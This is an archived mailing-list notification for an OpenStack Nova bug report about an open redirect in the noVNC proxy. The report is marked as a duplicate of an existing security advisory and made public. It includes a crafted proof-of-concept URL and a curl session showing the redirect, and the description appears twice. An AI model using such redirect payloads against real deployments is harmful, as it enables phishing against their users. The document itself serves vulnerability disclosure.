yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #89617
[Bug 1988302] Re: novncproxy open redirect
*** This bug is a duplicate of bug 1927677 ***
https://bugs.launchpad.net/bugs/1927677
That would be a question for the Ubuntu package maintainers, but we did
publish backports to the stable/train branch for that advisory and its
errata.
Thanks for confirming this is the same issue, I'll switch this report to
public and mark it as a duplicate of bug 1927677.
** Information type changed from Private Security to Public Security
** This bug has been marked a duplicate of bug 1927677
[OSSA-2021-002] Open Redirect in noVNC proxy (CVE-2021-3654)
** Description changed:
- This issue is being treated as a potential security risk under
- embargo. Please do not make any public mention of embargoed
- (private) security vulnerabilities before their coordinated
- publication by the OpenStack Vulnerability Management Team in the
- form of an official OpenStack Security Advisory. This includes
- discussion of the bug or associated fixes in public forums such as
- mailing lists, code review systems and bug trackers. Please also
- avoid private disclosure to other individuals not already approved
- for access to this information, and provide this same reminder to
- those who are made aware of the issue prior to publication. All
- discussion should remain confined to this private bug report, and
- any proposed fixes should be added to the bug as attachments. This
- embargo shall not extend past 2022-11-29 and will be made
- public by or on that date even if no fix is identified.
-
Security Issue
==============
We have found an open redirect vulnerability in Nova novncproxy
Impact
======
- Attackers can serve malicious websites that steal passwords or download ransomware to their victims' machines due to a redirect and there are a heap of other attack vectors.
- Attackers may be able to use this to execute believable phishing attacks, bypass authentication, or (in rare circumstances) violate CSRF mitigations.
Steps to Reproduce
==================
Simple curl the below url and it will redirect to google.com
http://nova-novncproxy:6080////google.com/%2f%2e%2e
Example
=======
$ curl "http://nova-novncproxy:6080////google.com/%2f.."; -v
* Trying 10.X.Y.Z...
* TCP_NODELAY set
* Connected to nova-novncproxy (10.X.Y.Z) port 6080 (#0)
> GET ////google.com/%2f.. HTTP/1.1
> Host: nova-novncproxy:6080
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: WebSockify Python/3.6.9
< Date: Wed, 31 Aug 2022 11:59:29 GMT
< Location: //google.com/%2f../
Reference
=========
https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1988302
Title:
novncproxy open redirect
Status in OpenStack Compute (nova):
New
Status in OpenStack Security Advisory:
Incomplete
Bug description:
Security Issue
==============
We have found an open redirect vulnerability in Nova novncproxy
Impact
======
- Attackers can serve malicious websites that steal passwords or download ransomware to their victims' machines due to a redirect and there are a heap of other attack vectors.
- Attackers may be able to use this to execute believable phishing attacks, bypass authentication, or (in rare circumstances) violate CSRF mitigations.
Steps to Reproduce
==================
Simple curl the below url and it will redirect to google.com
http://nova-novncproxy:6080////google.com/%2f%2e%2e
Example
=======
$ curl "http://nova-novncproxy:6080////google.com/%2f.."; -v
* Trying 10.X.Y.Z...
* TCP_NODELAY set
* Connected to nova-novncproxy (10.X.Y.Z) port 6080 (#0)
> GET ////google.com/%2f.. HTTP/1.1
> Host: nova-novncproxy:6080
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: WebSockify Python/3.6.9
< Date: Wed, 31 Aug 2022 11:59:29 GMT
< Location: //google.com/%2f../
Reference
=========
https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1988302/+subscriptions
